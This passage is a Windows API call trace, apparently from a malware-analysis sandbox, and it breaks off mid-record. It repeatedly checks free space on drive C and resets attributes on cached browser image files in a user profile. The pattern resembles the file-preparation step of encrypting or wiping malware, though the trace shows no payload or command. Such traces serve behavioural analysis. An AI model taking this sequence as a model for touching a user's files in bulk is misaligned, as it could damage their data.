1 [0142.056] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.061] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBTpvW[1].jpg", dwFileAttributes=0x80) returned 1 [0142.064] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.069] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVEOW[1].jpg", dwFileAttributes=0x80) returned 1 [0142.071] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.077] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVGsM[1].jpg", dwFileAttributes=0x80) returned 1 [0142.080] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.085] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVIzI[1].jpg", dwFileAttributes=0x80) returned 1 [0142.088] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.093] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVJ4r[1].jpg", dwFileAttributes=0x80) returned 1 [0142.096] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.102] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBVxM8[1].jpg", dwFileAttributes=0x80) returned 1 [0142.105] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.117] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBz9wz[1].jpg", dwFileAttributes=0x80) returned 1 [0142.121] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.137] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBzxW1[1].jpg", dwFileAttributes=0x80) returned 1 [0142.145] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.154] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC06Ub[1].jpg", dwFileAttributes=0x80) returned 1 [0142.157] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.163] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC095c[1].jpg", dwFileAttributes=0x80) returned 1 [0142.166] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.171] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0ALC[1].jpg", dwFileAttributes=0x80) returned 1 [0142.174] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.179] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0lYn[1].jpg", dwFileAttributes=0x80) returned 1 [0142.182] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.198] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0mlu[1].jpg", dwFileAttributes=0x80) returned 1 [0142.200] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.205] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[1].jpg", dwFileAttributes=0x80) returned 1 [0142.209] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.214] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0rDa[2].jpg", dwFileAttributes=0x80) returned 1 [0142.218] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.230] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBC0tCi[1].jpg", dwFileAttributes=0x80) returned 1 [0142.233] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.238] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDK7Yy[1].jpg", dwFileAttributes=0x80) returned 1 [0142.242] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.252] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDRbsH[1].jpg", dwFileAttributes=0x80) returned 1 [0142.255] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.260] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDZoZR[1].jpg", dwFileAttributes=0x80) returned 1 [0142.263] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.268] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE97O8[1].jpg", dwFileAttributes=0x80) returned 1 [0142.272] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.278] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBE9wSt[1].jpg", dwFileAttributes=0x80) returned 1 [0142.281] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.286] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEcHle[1].jpg", dwFileAttributes=0x80) returned 1 [0142.300] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.306] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdE0f[1].jpg", dwFileAttributes=0x80) returned 1 [0142.310] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.315] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdoQv[1].jpg", dwFileAttributes=0x80) returned 1 [0142.319] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.324] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdqEy[1].jpg", dwFileAttributes=0x80) returned 1 [0142.329] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.333] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdtWw[1].jpg", dwFileAttributes=0x80) returned 1 [0142.337] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.342] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdXJj[1].jpg", dwFileAttributes=0x80) returned 1 [0142.345] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.350] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeP0k[1].jpg", dwFileAttributes=0x80) returned 1 [0142.354] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.362] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeTuf[1].jpg", dwFileAttributes=0x80) returned 1 [0142.365] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.370] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfE6e[1].jpg", dwFileAttributes=0x80) returned 1 [0142.373] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.379] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfjuT[1].jpg", dwFileAttributes=0x80) returned 1 [0142.382] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.388] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEg9QV[1].jpg", dwFileAttributes=0x80) returned 1 [0142.391] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.396] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgGSl[1].jpg", dwFileAttributes=0x80) returned 1 [0142.400] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.405] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgiYw[1].jpg", dwFileAttributes=0x80) returned 1 [0142.408] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.413] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgJfz[1].jpg", dwFileAttributes=0x80) returned 1 [0142.417] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.422] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgqtY[1].jpg", dwFileAttributes=0x80) returned 1 [0142.425] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.433] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgsz3[1].jpg", dwFileAttributes=0x80) returned 1 [0142.437] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.442] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[1].jpg", dwFileAttributes=0x80) returned 1 [0142.445] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.451] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgtcS[2].jpg", dwFileAttributes=0x80) returned 1 [0142.454] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.459] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[1].jpg", dwFileAttributes=0x80) returned 1 [0142.463] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.468] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[2].jpg", dwFileAttributes=0x80) returned 1 [0142.471] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.478] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgyIm[1].jpg", dwFileAttributes=0x80) returned 1 [0142.481] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.486] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBg3ODX[2].png", dwFileAttributes=0x80) returned 1 [0142.489] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.494] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBiyCq[1].png", dwFileAttributes=0x80) returned 1 [0142.497] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.502] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBn4lUU[1].png", dwFileAttributes=0x80) returned 1 [0142.504] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.509] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBnMKeN[1].png", dwFileAttributes=0x80) returned 1 [0142.513] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0142.519] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBwGan9[1].jpg", dwFileAttributes=0x80) returned 1 [0142.521] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: 